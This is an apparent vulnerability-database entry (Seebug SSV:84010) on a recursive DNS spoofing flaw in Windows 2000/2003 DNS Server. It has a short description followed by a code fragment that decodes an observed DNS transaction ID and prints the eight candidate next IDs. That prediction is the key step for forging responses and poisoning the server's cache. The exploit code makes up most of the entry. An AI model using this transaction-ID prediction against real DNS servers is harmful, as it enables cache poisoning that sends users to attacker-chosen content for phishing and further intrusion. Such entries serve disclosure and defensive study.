Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1)

ID SSV:84010
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.

A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing. 

if ($zero!=0)
	print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
	print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";

print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$m++)
	print "".(($m<<11)|((($C+1) % 256)<<3))." ";
print "\n";